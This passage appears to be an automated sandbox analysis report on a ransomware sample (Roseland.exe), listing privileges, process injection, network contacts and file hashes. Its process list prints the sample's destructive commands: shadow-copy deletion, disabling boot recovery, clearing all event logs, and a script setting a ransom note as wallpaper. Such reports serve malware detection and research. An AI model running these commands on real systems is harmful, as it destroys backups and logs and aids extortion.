Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4892 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 2556 wrote to memory of 1992 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2556 wrote to memory of 1992 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4892 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 2656 wrote to memory of 3612 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2656 wrote to memory of 3612 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4880 wrote to memory of 4812 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4880 wrote to memory of 4812 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2784 wrote to memory of 4956 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2784 wrote to memory of 4956 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3804 wrote to memory of 4000 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3804 wrote to memory of 4000 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4892 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4892 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 2660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4984 wrote to memory of 2660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4984 wrote to memory of 4736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 4984 wrote to memory of 4736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\302165477.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
N/A 93.184.220.29:80 tcp
N/A 20.50.80.209:443 tcp
N/A 104.80.225.205:443 tcp
N/A 72.21.81.240:80 tcp
N/A 72.21.81.240:80 tcp
N/A 72.21.81.240:80 tcp
N/A 8.247.210.254:80 tcp

Files

memory/2556-132-0x0000000000000000-mapping.dmp

memory/1992-134-0x0000000000000000-mapping.dmp

memory/2784-135-0x0000000000000000-mapping.dmp

memory/2656-137-0x0000000000000000-mapping.dmp

memory/4880-136-0x0000000000000000-mapping.dmp

memory/3804-133-0x0000000000000000-mapping.dmp

memory/3612-138-0x0000000000000000-mapping.dmp

memory/4812-139-0x0000000000000000-mapping.dmp

memory/4956-140-0x0000000000000000-mapping.dmp

memory/4000-141-0x0000000000000000-mapping.dmp

memory/3612-142-0x000001BCCD040000-0x000001BCCD062000-memory.dmp

memory/3612-143-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

memory/3612-144-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

memory/4984-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb88ced2c4ccde482413852902ecd0df
SHA1 6ad26dfaaa606e82710ad0712d8b1c4abec1d6dd
SHA256 9cc249792c1a673ae90260e40d62521948daa94b01565a1c06b403cc86e39f5b
SHA512 7c1adea6f5e286712759055c3d9026260c9619b3bcb651283d342aff2fe3db16ebf5d82d1d30329169cfd8490fc86853ccc93b12a97cb071b7a74747712ff285

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2660-149-0x0000000000000000-mapping.dmp

memory/4984-150-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

memory/4736-151-0x0000000000000000-mapping.dmp

memory/4984-152-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp